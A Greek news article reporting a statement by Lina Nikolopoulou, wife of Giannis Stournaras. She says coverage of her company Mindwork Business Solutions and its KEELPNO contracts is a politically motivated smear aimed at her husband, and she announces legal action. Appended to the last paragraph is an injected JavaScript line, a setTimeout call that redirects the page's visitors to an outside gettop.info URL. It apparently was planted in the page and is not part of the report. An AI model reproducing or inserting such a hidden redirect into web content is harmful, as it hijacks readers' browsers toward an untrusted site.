Η σύζυγος Στουρνάρα περνά στην αντεπίθεση: Σπιλώνουν εμένα, ενώ στοχεύουν τον Γιάννη

0
7

 

Παρέμβαση έκανε η σύζυγος του Γιάννη Στουρνάρα, Λίνα Νικολοπούλου κάνοντας λόγο για εκστρατεία σπίλωσης που έχει ως πραγματικό στόχο τον σύζυγό της.

Σε δήλωσή της η κα Νικολοπούλου κάνει λόγο για «απροκάλυπτη και συστηματική προσπάθεια δημιουργίας εντυπώσεων για δήθεν κατ’ εξακολούθηση παραβατική συμπεριφορά και διαπλεκόμενη λειτουργία από μια εταιρεία με ιστορία οκτώ χρόνων. Μια εταιρεία με καθ’ όλα σύννομη δραστηριότητα που έχει καταξιωθεί στο χώρο της, όπως αποδεικνύεται από τη διαχρονικότητά της, τα οικονομικά της μεγέθη και την εμπιστοσύνη των πελατών της».

«Με τέτοιες εκστρατείες σπίλωσης μια καθ’ όλα βιώσιμη και αναγνωρισμένη επιχείρηση καταρρακώνεται δημόσια και οδηγείται σε κατάρρευση και τελικά κλείσιμο» σημειώνει, τονίζοντας ότι «όλα αυτά αποσκοπούν στην πολιτική δίωξη ενός τρίτου προσώπου, κατά την πάγια τακτική των συκοφαντών να πλήττουν έμμεσα τον στόχο τους προσβάλλοντας τα πρόσωπα οικείων του. Η πολιτική σκοπιμότητα του δημοσιεύματος είναι προφανής: από τις δεκάδες συμβάσεις του ΚΕΕΛΠΝΟ επιλέγονται μόνο αυτές που αφορούν την εταιρεία Mindwork Business Solutions για δημόσια διαπόμπευση και σπίλωση. Το βασικό ζητούμενο είναι ποιος είναι ο σύζυγος της ιδιοκτήτριας».

Στην ανακοίνωσή της η κα Νικολοπούλου δηλώνει πρόθυμη για όποιον έλεγχο από τις αρχές ενώ παράλληλα ξεκαθαρίζει ότι θα κινηθεί νομικά προκειμένου να απαντήσει «στον πόλεμο διαρκείας» εις βάρος της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here